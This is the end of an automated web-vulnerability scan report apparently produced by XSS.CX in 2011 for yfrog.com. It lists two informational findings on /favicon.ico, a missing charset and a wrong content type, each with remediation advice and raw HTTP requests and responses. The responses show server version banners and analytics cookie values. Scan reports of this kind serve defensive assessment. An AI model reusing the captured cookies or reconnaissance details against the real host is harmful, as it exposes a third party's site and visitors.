Content-Type: application/x-javascript
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Length: 71228

var imageChecker = null;
//var MAX_POPUP_IMG_HEIGHT = 600;
var MAX_POPUP_IMG_HEIGHT = 490;
var NETWORK_NAMES = ['site-twitter'];
var SOCIAL_NETWORKS = [];
SOCIAL_NETWORKS['site-twitter'] = {enabled: t
...[SNIP]...
<label class="cabinet">';
html += '<input type="file" class="file" name="file" data-origin="' + args.origin + '" />';
html += '</label>
...[SNIP]...

6. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yfrog.com
Path:   /favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /favicon.ico HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 1150

............ .h.......(....... ..... .....@..................................    .../z..h_...`..y...............F}..Q............................=...*...*...,....../.......^8...6......o..................
...[SNIP]...

7. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://yfrog.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 1150

............ .h.......(....... ..... .....@..................................    .../z..h_...`..y...............F}..Q............................=...*...*...,....../.......^8...6......o..................
...[SNIP]...

Report generated by XSS.CX at Thu Aug 18 15:53:54 GMT-06:00 2011.